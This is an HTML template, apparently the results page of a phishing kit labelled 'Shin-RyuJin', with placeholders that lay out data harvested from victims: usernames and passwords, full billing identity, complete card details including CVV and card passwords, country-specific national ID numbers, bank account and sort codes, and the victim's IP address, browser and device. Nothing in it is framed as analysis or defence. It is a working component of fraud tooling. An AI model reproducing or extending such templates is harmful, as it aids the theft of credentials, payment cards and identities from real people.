<div style="width:60%;border:2px solid #333;margin:0 auto;">
    <center><h3 style="font-weight: bold;font-family:monospace;">Shin-RyuJin {app_name}</h3><hr style="width:80%;border:1px solid #111"></center>
<pre style="margin-left:10%">
## ACCOUNT DETAILS ##

 Username          :: {username}
 Password          :: {password}
---------------------------------

## BILLING DETAILS ##

 Fullname          :: {fullname}
 Address           :: {address}
 City              :: {city}
 State             :: {state}
 country           :: {country}
 Zip/Postcode      :: {postcode}
 BirthDay          :: {birthday}
 Phone             :: {phone}
 ---------------------------------

## CARD DETAILS ##

 Bank              :: {bank}
 Brand - Type      :: {brandtype}
 Level - Country   :: {levelcountry}
 CardHolders       :: {cardholder}
 CardNumber        :: {cardnumber}
 Expired Date      :: {expired}
 Security (CVV)    :: {cvv}
 Amex CID          :: {cid}
 Copy              :: {copy}
 AutoPay           :: {autopay}
---------------------------------

## ADDTIONAL INFORMATION ##

 SSN               :: {ssn}           [US,CA]
 Qatar ID          :: {qatarid}       [QA]
 ID Number         :: {idnumber}      [GR,HK]
 Citizen ID        :: {citizenid}     [TH]
 National ID       :: {nationalid}    [SA]
 Sort Code         :: {sortcode}      [UK,IE]
 Passport Number   :: {passport}      [CY]
 Civil ID          :: {civilid}       [KW]
 Bank Access Number:: {ban}           [NZ]
 Account Number    :: {accno}         [UK,IE,IN,CH]
 Credit Limit      :: {climit}        [IE,TH,IN,NZ,AU]
 Bank Account      :: {bankaccount}   [AU]
 NAB ID/OSID       :: {nabid}         [AU]
 CARD ID           :: {cardid}        [JP,CH]
 CARD PASSWORD     :: {cardpass}      [JP,CH]
---------------------------------

 ## ACCESS INFORMATION ##

 User IP            :: {ip}
 UserAgent          :: {agent}
 Browser            :: {browser}
 Device             :: {device}
 Date               :: {date}
</pre>
</div>

